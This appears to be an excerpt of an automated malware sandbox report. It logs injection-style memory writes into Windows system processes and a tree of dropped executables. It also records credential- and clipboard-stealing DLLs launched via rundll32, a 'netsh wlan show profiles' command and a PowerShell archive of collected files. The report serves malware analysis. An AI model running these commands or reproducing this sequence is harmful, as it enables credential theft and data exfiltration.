Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D9000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179DA000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\msiexec.exe base: C44452B010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B1000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B5000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B7000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B8000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B9000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91BA000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\audiodg.exe base: 6463CB0010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D1000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D5000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D7000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D8000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D9000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179DA000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\msiexec.exe base: A2507DC010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B1000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B5000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B7000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B8000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B9000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52BA000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\svchost.exe base: A56AEAD010	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B1000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B5000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B7000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B8000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B9000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91BA000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Memory written: C:\Windows\System32\audiodg.exe base: F132077010	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B1000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B5000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B7000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B8000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B9000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52BA000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\svchost.exe base: B1A8FE2010
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D0000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D1000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D5000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D7000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D8000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D9000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179DA000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\msiexec.exe base: 703BC13010
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B1000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B5000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B7000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B8000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B9000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91BA000
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Memory written: C:\Windows\System32\audiodg.exe base: F613A3F010
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D0000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D1000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D5000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D7000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D8000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179D9000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\msiexec.exe base: 7FF7179DA000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\msiexec.exe base: D3C403F010
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B1000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B5000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B7000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B8000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52B9000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\svchost.exe base: 7FF7E52BA000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B1000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B5000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B7000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B8000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B9000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\audiodg.exe base: 7FF7A91BA000
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\audiodg.exe base: 71EFE74010
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Memory written: C:\Windows\System32\svchost.exe base: F16773010

Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"	Jump to behavior
Source: C:\Users\user\Desktop\yINR7uQlPr.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Process created: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe "C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\1DC30FADAFF92643095942\1DC30FADAFF92643095942.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Process created: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe "C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe"
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Users\user\AppData\Local\Temp\10000820101\update.exe "C:\Users\user\AppData\Local\Temp\10000820101\update.exe"
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Users\user\AppData\Local\Temp\10000830101\update.exe "C:\Users\user\AppData\Local\Temp\10000830101\update.exe"
Source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe	Process created: C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe "C:\Users\user\AppData\Local\Temp\10000840101\ssg.exe"
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
Source: C:\Users\user\AppData\Local\Temp\10000820101\update.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Process created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Process created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
Source: C:\Users\user\AppData\Local\Temp\10000830101\update.exe	Process created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"

Source: explorer.exe, 00000004.00000003.3095270495.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3520793875.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2052790919.0000000009BA9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000004.00000002.3380272580.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2048096649.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.2050130274.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3399053064.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.3380272580.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000002.3380272580.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2048096649.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000004.00000002.3380272580.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.2048096649.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000004.00000002.3376670796.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.2047725228.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Source: C:\Windows\explorer.exe

Code function: 4_2_033406EC cpuid

4_2_033406EC

Source: C:\Windows\explorer.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	4_2_033472AC
Source: C:\Windows\explorer.exe	Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,	4_2_0334813C
Source: C:\Windows\explorer.exe	Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,	4_2_033479B4
Source: C:\Windows\explorer.exe	Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,	4_2_0333E9CC
Source: C:\Windows\explorer.exe	Code function: __crtGetLocaleInfoA,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,_calloc_crt,free,	4_2_0333FF98
Source: C:\Windows\explorer.exe	Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,	4_2_03347428
Source: C:\Windows\explorer.exe	Code function: _getptd,__lc_wcstolc,__get_qualified_locale,__lc_lctowcs,GetLocaleInfoEx,GetACP,	4_2_098429BC
Source: C:\Windows\explorer.exe	Code function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,	4_2_0984A0F8
Source: C:\Windows\explorer.exe	Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_mon,free,free,free,free,	4_2_09848028
Source: C:\Windows\explorer.exe	Code function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,GetLocaleInfoEx,_calloc_crt,GetLocaleInfoEx,free,	4_2_09840B98
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoEx,	4_2_09850378
Source: C:\Windows\explorer.exe	Code function: _getptd,GetLocaleInfoEx,GetLocaleInfoEx,TestDefaultCountry,GetLocaleInfoEx,TestDefaultCountry,_getptd,GetLocaleInfoEx,	4_2_09849AD4
Source: C:\Windows\explorer.exe	Code function: _calloc_crt,_malloc_crt,free,_malloc_crt,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__free_lconv_num,free,free,free,	4_2_098485B4
Source: C:\Windows\explorer.exe	Code function: __getlocaleinfo,_malloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,	4_2_0983F5CC
Source: C:\Windows\explorer.exe	Code function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,	4_2_09848D3C
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoEx,malloc,GetLocaleInfoEx,WideCharToMultiByte,free,	4_2_09847D50
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoEx,	4_2_09849FF4
Source: C:\Windows\explorer.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetACP,	4_2_09849F40
Source: C:\Windows\explorer.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	4_2_09847EAC
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	16_2_00007FF8B836FA48
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: GetProcAddress,GetLocaleInfoW,	16_2_00007FF8B831DC20
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: EnterCriticalSection,EnumSystemLocalesW,LeaveCriticalSection,	16_2_00007FF8B836D2E0
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: EnumSystemLocalesW,	16_2_00007FF8B836F35C
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: GetPrimaryLen,EnumSystemLocalesW,	16_2_00007FF8B836F3C4
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: GetPrimaryLen,EnumSystemLocalesW,	16_2_00007FF8B836F478
Source: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	16_2_00007FF8B836F8C0
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	18_2_006D2516
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: EnumSystemLocalesW,	18_2_006D27B8
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: EnumSystemLocalesW,	18_2_006D2803
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: EnumSystemLocalesW,	18_2_006C88AC
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: EnumSystemLocalesW,	18_2_006D289E
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	18_2_006D2929
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: GetLocaleInfoW,	18_2_006D2B7C
Source: C:\Users\user\AppData\Local\Temp\EC2F.tmp.gfx.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	18_2_006D2CA2
